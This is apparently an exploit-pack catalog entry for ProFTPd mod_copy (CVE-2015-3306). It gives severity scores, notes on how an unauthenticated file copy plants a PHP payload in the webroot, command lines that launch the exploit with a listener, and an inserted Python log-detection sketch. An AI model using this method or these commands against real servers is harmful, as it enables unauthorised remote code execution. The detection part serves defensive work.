CVSS2 | 10 High |
---|---|
Access Vector | NETWORK |
Access Complexity | LOW |
Authentication | NONE |
Confidentiality Impact | COMPLETE |
Integrity Impact | COMPLETE |
Availability Impact | COMPLETE |
Vector | AV:N/AC:L/Au:N/C:C/I:C/A:C |
EPSS | 0.973 High |
Percentile | 99.8% |

Name | proftpd_mod_copy |
---|---|
CVE | CVE-2015-3306 Exploit Pack |
VENDOR: | |
NOTES: |
This exploit abuses the commands of the mod_copy module in ProFTPd (version <= 1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesystem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files.
In the first part of the attack, the exploit copies /proc/self/cmdline to the /tmp/ folder with a PHP payload as the filename, then copies this file to the webroot as a PHP file.
The second part of the attack involves making a GET request to the PHP file just created, with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP shellcode.
Note about the target:
To exploit this vulnerability, the mod_copy module must be compiled with the ProFTPd sources. We also need write privileges on the chosen webroot folder (unless the FTP server was started as root).
Then we must assume that the webserver has a PHP module.
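The copy sequence described in the notes leaves a recognizable trace in FTP command logs. The following detection sketch is an added example, not part of the exploit pack or of ProFTPd; the log layout, the `find_mod_copy_abuse` name, the `/var/www/` webroot and all sample lines are assumptions constructed for illustration.

```python
import re

# Assumed log layout (a custom ProFTPD LogFormat, not a default):
#   <client-ip> <user or "-"> "<raw FTP command>" <reply-code>
LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\d{3})$')
COPY_RE = re.compile(r'^SITE\s+(CPFR|CPTO)\s+(.+)$', re.IGNORECASE)

# Constructed sample lines; addresses, names and paths are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - "SITE CPFR /proc/self/cmdline" 350
198.51.100.7 - "SITE CPTO /tmp/PLACEHOLDER_NAME" 250
198.51.100.7 - "SITE CPFR /tmp/PLACEHOLDER_NAME" 350
198.51.100.7 - "SITE CPTO /var/www/html/PLACEHOLDER.php" 250
203.0.113.20 alice "SITE CPFR /home/alice/report.txt" 350
203.0.113.20 alice "SITE CPTO /home/alice/report.bak" 250
203.0.113.20 alice "RETR report.bak" 226
"""

def find_mod_copy_abuse(log_text, webroot="/var/www/"):
    """Pair each SITE CPFR with the next SITE CPTO from the same client and
    return the copies that match the pattern described in the notes."""
    pending = {}   # client ip -> (source path, user) from the last CPFR
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        c = COPY_RE.match(m.group(3)) if m else None
        if not c:
            continue
        ip, user, code = m.group(1), m.group(2), m.group(4)
        verb, path = c.group(1).upper(), c.group(2).strip()
        if verb == "CPFR":
            pending[ip] = (path, user)
            continue
        src, src_user = pending.pop(ip, (None, user))
        reasons = []
        if "-" in (user, src_user):          # copy issued before any login
            reasons.append("unauthenticated")
        if src and src.startswith("/proc/"):
            reasons.append("source-in-proc")
        if path.startswith(webroot) and path.lower().endswith(".php"):
            reasons.append("php-into-webroot")
        if reasons:
            findings.append({"ip": ip, "src": src, "dst": path,
                             "succeeded": code == "250", "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in find_mod_copy_abuse(SAMPLE_LOG):
        print(finding)
```

Any `unauthenticated` finding on its own indicates a server that still accepts SITE CPFR/CPTO before login and should be patched or have mod_copy removed.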
This exploit has been tested on:
Command line usage:
$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7
$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556
Repeatability: Infinite
References: http://bugs.proftpd.org/show_bug.cgi?id=4169
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
CERT Advisory: None
Date Public: 05/18/2015
CVSS: 10